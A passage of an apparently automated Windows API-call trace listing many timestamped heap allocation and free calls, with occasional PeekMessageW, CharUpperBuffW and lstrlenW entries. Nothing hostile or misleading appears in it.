HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef100 | out: hHeap=0x2af0000) returned 1 [0084.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef100 [0084.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef658 | out: hHeap=0x2af0000) returned 1 [0084.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef5c8 [0084.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef430 [0084.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0084.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e130 [0084.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef5f8 [0084.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72408 [0084.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef5f8 | out: hHeap=0x2af0000) returned 1 [0084.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e1d0 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef460 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef508 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724d8 [0084.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef5c8 | out: hHeap=0x2af0000) returned 1 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e220 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72518 [0084.052] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e220 | out: hHeap=0x2af0000) returned 1 [0084.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72518 | out: hHeap=0x2af0000) returned 1 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef5c8 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72598 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef5f8 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72418 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72518 [0084.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72518 | out: hHeap=0x2af0000) returned 1 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef628 [0084.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ef658 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e3d8 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72438 [0084.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e400 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef700 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0084.052] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72418 [0084.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e2e8 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7c0 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72518 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e220 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef868 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72428 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef868 | out: hHeap=0x2af0000) returned 1 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e248 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef910 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef868 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e2e8 | out: hHeap=0x2af0000) returned 1 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.053] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e270 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef928 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723d8 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef970 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef730 | out: hHeap=0x2af0000) returned 1 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0084.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0084.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0084.054] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9d0 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72418 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbf8 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72478 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72478 | out: hHeap=0x2af0000) returned 1 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72418 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efac0 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72418 [0084.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbf8 | out: hHeap=0x2af0000) returned 1 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9d0 | out: hHeap=0x2af0000) returned 1 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa30 | out: hHeap=0x2af0000) returned 1 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.054] lstrlenW (lpString="20") returned 2 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efac0 | out: hHeap=0x2af0000) returned 1 [0084.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723b8 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef730 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.055] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.055] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72418 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9d0 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbf8 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72448 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72448 | out: hHeap=0x2af0000) returned 1 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a723c8 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9d0 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbf8 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.056] lstrlenW (lpString="33") returned 2 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72418 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef730 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.057] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.057] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72468 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723b8 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72418 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbf8 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efac0 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72448 [0084.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9d0 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbf8 | out: hHeap=0x2af0000) returned 1 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa30 | out: hHeap=0x2af0000) returned 1 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723b8 | out: hHeap=0x2af0000) returned 1 [0084.057] lstrlenW (lpString="20") returned 2 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efac0 | out: hHeap=0x2af0000) returned 1 [0084.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72448 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9d0 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0084.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef790 [0084.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72418 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef730 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72468 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72418 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef790 | out: hHeap=0x2af0000) returned 1 [0084.058] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0084.058] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0084.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0084.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0084.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef730 | out: hHeap=0x2af0000) returned 1 [0084.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef730 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef700 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e400 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72438 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e3d8 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef970 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef928 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723d8 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e270 | out: hHeap=0x2af0000) returned 1 [0084.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef868 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef910 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e248 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72428 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e220 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef658 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72598 | out: hHeap=0x2af0000) returned 1 [0084.059] HeapFree (in: 